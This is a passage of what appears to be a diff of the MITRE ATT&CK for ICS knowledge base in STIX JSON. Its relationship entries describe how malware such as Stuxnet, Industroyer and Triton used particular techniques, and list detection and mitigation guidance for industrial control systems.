Retrieved December 18, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-31T17:56:07.978Z", + "description": "During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) supplied the name of the payload DLL to [Industroyer](https://attack.mitre.org/software/S0604) via a command line parameter.(Citation: ESET Industroyer)", + "relationship_type": "uses", + "source_ref": "campaign--aa73efef-1418-4dbe-b43c-87a498e97234", + "target_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1d35c947-447f-4693-9ab0-32dff56e664e", + "created": "2021-04-13T12:45:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-29T20:19:47.429Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) enumerates and parses the System Data Blocks (SDB) using the s7blk_findfirst and s7blk_findnext API calls in s7otbxdx.dll. Stuxnet must find an SDB with the DWORD at offset 50h equal to 0100CB2Ch. 
This specifies that the system uses the Profibus communications processor module CP 342-5. In addition, specific values are searched for and counted: 7050h and 9500h. 7050h is assigned to part number KFC750V3 which appears to be a frequency converter drive (also known as variable frequency drive) manufactured by Fararo Paya in Teheran, Iran. 9500h is assigned to Vacon NX frequency converter drives manufactured by Vacon based in Finland.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)\n\n[Stuxnet](https://attack.mitre.org/software/S0603) was specifically targeting CPUs 6ES7-315-2 (Series 300) with special system data block characteristics for sequence A or B and 6ES7-315-2 for sequence C. The PLC type can also be checked using the s7ag_read_szl API.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--86ede365-4539-4475-b90b-9b3bfd2dbe97", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:18:43.413Z", + "description": "Monitor devices configuration logs which may contain alerts that indicate whether a program download has occurred. 
Devices may maintain application logs that indicate whether a full program download, online edit, or program append function has occurred.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7d3ef0e3-560c-4e46-a0b4-dd1efc29e835", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T14:39:20.443Z", + "description": "Monitor for anomalies related to discovery related ICS functions, including devices that have not previously used these functions or for functions being sent to many outstations. Note that some ICS protocols use broadcast or multicast functionality, which may produce false positives. 
Also monitor for hosts enumerating network connected resources using non-ICS enterprise protocols.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c0efb24a-2329-401a-bba6-817f2867bb3f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.183Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 
2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--8c1b22bd-7e31-427f-a9c5-085a606212ca", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:59:36.071Z", + "description": "Monitor for unexpected deletion of files.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--e905dad2-00d6-477c-97e8-800427abd0e8", + "target_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--aae5d42f-6bfc-44b6-8ff3-4b7abb4526ca", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:32:51.548Z", + "description": "Monitor for newly executed processes that may stop or disable services on a system to render those services unavailable to legitimate users.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": 
"relationship", + "id": "relationship--e8d5ee60-952f-42ff-bf48-7da9cd0fdb23", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:46:16.720Z", + "description": "When authentication is not required to access an exposed remote service, monitor for follow-on activities such as anomalous external use of the exposed API or application.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--798919d3-df8b-463f-b2be-4c1aa8089384", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-10-14T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.226Z", + "relationship_type": "mitigates", + "description": "Segment and control software movement between business and OT environments by way of one directional DMZs. Web access should be restricted from the OT environment. Engineering workstations, including transient cyber assets (TCAs) should have minimal connectivity to external networks, including Internet and email, further limit the extent to which these devices are dual-homed to multiple networks. 
(Citation: North America Transmission Forum December 2019)\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9", + "external_references": [ + { + "source_name": "North America Transmission Forum December 2019", + "description": "North America Transmission Forum 2019, December NATF Transient Cyber Asset Guidance Retrieved. 2020/09/25 ", + "url": "https://www.natf.net/docs/natf/documents/resources/security/natf-transient-cyber-asset-guidance.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5804ae3d-0daf-47a5-b026-d42878f55803", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.166Z", + "relationship_type": "mitigates", + "description": "This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.\n", + "source_ref": "course-of-action--469b78dd-a54d-4f7c-8c3b-4a1dd916b433", + "target_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--d72e7d01-56be-4fbd-8957-3384533ba83b", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Jos Wetzels January 2018", + "description": "Jos Wetzels 2018, January 16 Analyzing the TRITON industrial malware Retrieved. 
2019/10/22 ", + "url": "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:28:23.911Z", + "description": "[Triton](https://attack.mitre.org/software/S1009) leverages a reconstructed TriStation protocol within its framework to trigger APIs related to program download, program allocation, and program changes. (Citation: Jos Wetzels January 2018)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b2defaaf-625d-416e-8a9d-8be6d89bacdc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.192Z", + "relationship_type": "mitigates", + "description": "ICS environments typically have more statically defined devices, therefore minimize the use of both IT discovery protocols (e.g., DHCP, LLDP) and discovery functions in automation protocols. (Citation: D. Parsons and D. Wylie September 2019) (Citation: Colin Gray) Examples of automation protocols with discovery capabilities include OPC UA Device Discovery (Citation: Josh Rinaldi April 2016), BACnet (Citation: Aditya K Sood July 2019), and Ethernet/IP. (Citation: Langner November 2018)\n", + "source_ref": "course-of-action--52c7a1a9-3a78-4528-a44f-cd7b0fa3541a", + "target_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "external_references": [ + { + "source_name": "D. Parsons and D. 
Wylie September 2019", + "description": "D. Parsons and D. Wylie 2019, September Practical Industrial Control System (ICS) Cybersecurity: IT and OT Have Converged Discover and Defend Your Assets Retrieved. 2020/09/25 ", + "url": "https://www.csiac.org/journal-article/practical-industrial-control-system-ics-cybersecurity-it-and-ot-have-converged-discover-and-defend-your-assets/" + }, + { + "source_name": "Colin Gray", + "description": "Colin Gray D. Parsons and D. Wylie 2019, September Practical Industrial Control System (ICS) Cybersecurity: IT and OT Have Converged Discover and Defend Your Assets Retrieved. 2020/09/25 How SDN Can Improve Cybersecurity in OT Networks Retrieved. 2020/09/25 ", + "url": "https://cdn.selinc.com/assets/Literature/Publications/Technical%20Papers/6891_HowSDN_CG_20180720_Web2.pdf?v=20190312-231901" + }, + { + "source_name": "Josh Rinaldi April 2016", + "description": "Josh Rinaldi 2016, April Still a Thrill: OPC UA Device Discovery Retrieved. 2020/09/25 ", + "url": "https://www.rtautomation.com/rtas-blog/still-a-thrill-opc-ua-device-discovery/" + }, + { + "source_name": "Aditya K Sood July 2019", + "description": "Aditya K Sood 2019, July Discovering and fingerprinting BACnet devices Retrieved. 2020/09/25 ", + "url": "https://www.helpnetsecurity.com/2019/07/10/bacnet-devices/" + }, + { + "source_name": "Langner November 2018", + "description": "Langner 2018, November Why Ethernet/IP changes the OT asset discovery game Retrieved. 
2020/09/25 ", + "url": "https://www.langner.com/2018/11/why-ethernet-ip-changes-the-ot-asset-discovery-game/" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--1d399f67-090e-444b-b75d-eed4b1780f08", + "created": "2022-09-26T18:42:16.844Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T18:42:16.844Z", + "description": "Monitor device application logs for firmware changes, although not all devices will produce such logs.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--604a9bf0-81a3-425b-9005-779c4f0f749d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.195Z", + "relationship_type": "mitigates", + "description": "Harden the system through operating system controls to prevent the known or unknown use of malicious removable media.\n", + "source_ref": "course-of-action--9a945a29-5233-4422-a9e3-3e957b0e8bce", + "target_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + 
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--03d44496-7a15-4e23-820f-b6f1079dbbd3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.209Z", + "relationship_type": "mitigates", + "description": "A patch management process should be implemented to check unused dependencies, unmaintained and/or previously vulnerable dependencies, unnecessary features, components, files, and documentation.\n", + "source_ref": "course-of-action--97f33c84-8508-45b9-8a1d-cac921828c9e", + "target_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--f9625775-662c-425e-9ea0-6cb3f3bf5c3c", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T14:34:29.743Z", + "description": "Monitor for unexpected ICS protocol command functions to controllers from existing master devices (including from new processes) or from new devices. 
The latter is like detection for [Rogue Master](https://attack.mitre.org/techniques/T0848) but requires ICS function level insight to determine if an unauthorized device is issuing commands (e.g., a historian).\n\nMonitoring for unexpected or problematic values below the function level will provide better insights into potentially malicious activity but at the cost of additional false positives depending on the underlying operational process.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--bff99f91-e1a9-4379-a2d9-5a99615a95d1", + "type": "relationship", + "created": "2020-09-22T19:41:27.951Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Secureworks REvil September 2019", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020." + }, + { + "source_name": "Secureworks GandCrab and REvil September 2019", + "url": "https://www.secureworks.com/blog/revil-the-gandcrab-connection", + "description": "Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020." 
+ } + ], + "modified": "2020-09-22T19:41:27.951Z", + "description": "(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)", + "relationship_type": "uses", + "source_ref": "intrusion-set--c77c5576-ca19-42ed-a36f-4b4486a84133", + "target_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--99ec0a8e-4a4f-427c-89db-163e4b206021", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.094Z", + "relationship_type": "mitigates", + "description": "Hot-standbys in diverse locations can ensure continued operations if the primarily system are compromised or unavailable. At the network layer, protocols such as the Parallel Redundancy Protocol can be used to simultaneously use redundant and diverse communication over a local network. (Citation: M. Rentschler and H. Heine)\n", + "source_ref": "course-of-action--f0f5c87a-a58d-440a-b3b5-ca679d98c6dd", + "target_ref": "attack-pattern--e33c7ecc-5a38-497f-beb2-a9a2049a4c20", + "external_references": [ + { + "source_name": "M. Rentschler and H. Heine", + "description": "M. Rentschler and H. Heine The Parallel Redundancy Protocol for industrial IP networks Retrieved. 
2020/09/25 ", + "url": "https://ieeexplore.ieee.org/document/6505877" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--c2484b15-7dd0-4280-8898-a6a7da6f0ca2", + "created": "2023-03-10T20:09:49.009Z", + "revoked": false, + "external_references": [ + { + "source_name": "Marshall Abrams July 2008", + "description": "Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ", + "url": "https://www.mitre.org/sites/default/files/pdf/08_1145.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-10T20:09:49.009Z", + "description": "In the [Maroochy Water Breach](https://attack.mitre.org/campaigns/C0020), the adversary used a dedicated analog two-way radio system to send false data and instructions to pumping stations and the central computer.(Citation: Marshall Abrams July 2008)", + "relationship_type": "uses", + "source_ref": "campaign--70cab19e-1745-425e-b3db-c02cd5ff157a", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--92ea1c2a-3835-43de-bb56-24e937a6f322", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:31:12.226Z", + "description": "Monitor for events associated with scripting execution, such as the loading of modules 
associated with scripting languages (e.g., JScript.dll, vbscript.dll).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1", + "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b4b698a7-b80e-41f6-8ca2-a954270cceb3", + "created": "2022-09-27T17:37:02.670Z", + "revoked": false, + "external_references": [ + { + "source_name": "Nzyme Alerts Intro", + "description": "Koopmann, Lennart. (n.d.). Nzyme Alerts Introduction. Retrieved September 26, 2022.", + "url": "https://www.nzyme.org/docs/alerts/intro" + }, + { + "source_name": "Wireless Intrusion Detection", + "description": "Tomko, A.; Rieser, C; Buell, H.; Zeret, D.; Turner, W.. (2007, March). Wireless Intrusion Detection. Retrieved September 26, 2022.", + "url": "https://apps.dtic.mil/sti/pdfs/ADA466332.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T17:37:02.670Z", + "description": "Purely passive network sniffing cannot be detected effectively. In cases where the adversary interacts with the wireless network (e.g., joining a Wi-Fi network) detection may be possible. Monitor for new or irregular network traffic flows which may indicate potentially unwanted devices or sessions on wireless networks. 
In Wi-Fi networks monitor for changes such as rogue access points or low signal strength, indicating a device is further away from the access point then expected and changes in the physical layer signal.(Citation: Nzyme Alerts Intro) (Citation: Wireless Intrusion Detection) Network traffic content will provide important context, such as hardware (e.g., MAC) addresses, user accounts, and types of messages sent.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--0fe075d5-beac-4d02-b93e-0f874997db72", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--754521fc-4306-4daa-831b-6b6fb45847e2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.108Z", + "relationship_type": "mitigates", + "description": "All APIs used to perform execution, especially those hosted on embedded controllers (e.g., PLCs), should provide adequate authorization enforcement of user access. Minimize user's access to only required API calls. (Citation: MITRE June 2020)\n", + "source_ref": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd", + "target_ref": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", + "external_references": [ + { + "source_name": "MITRE June 2020", + "description": "MITRE 2020, June CWE CATEGORY: 7PK - API Abuse Retrieved. 
2020/09/25 ", + "url": "https://cwe.mitre.org/data/definitions/227.html" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--0a5d2136-e1f5-4a54-be64-a558f918bf0d", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:29:20.151Z", + "description": "All field controllers should require users to authenticate for all remote or local management sessions. The authentication mechanisms should also support [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), and [User Account Management](https://attack.mitre.org/mitigations/M0918).", + "relationship_type": "mitigates", + "source_ref": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "target_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9fb2a9b2-3b25-4f77-9f7a-e832b2e5071a", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 
2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:54:30.385Z", + "description": "Using its protocol payloads, [Industroyer](https://attack.mitre.org/software/S0604) sends unauthorized commands to RTUs to change the state of equipment. (Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6c15ec9f-2b48-419c-adc1-f989833f6187", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-10-14T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.224Z", + "relationship_type": "mitigates", + "description": "Install anti-virus software on all workstation and transient assets that may have external access, such as to web, email, or remote file shares.\n", + "source_ref": "course-of-action--faf2b40e-5981-433f-aa46-17458e0026f7", + "target_ref": "attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--730580d4-d68c-407f-9d09-f379e9aefc7e", + "created": "2023-03-30T19:25:41.475Z", + "revoked": false, + "external_references": [ + { + "source_name": "Industroyer2 Forescout July 2022", + "description": "Forescout. (2022, July 14). 
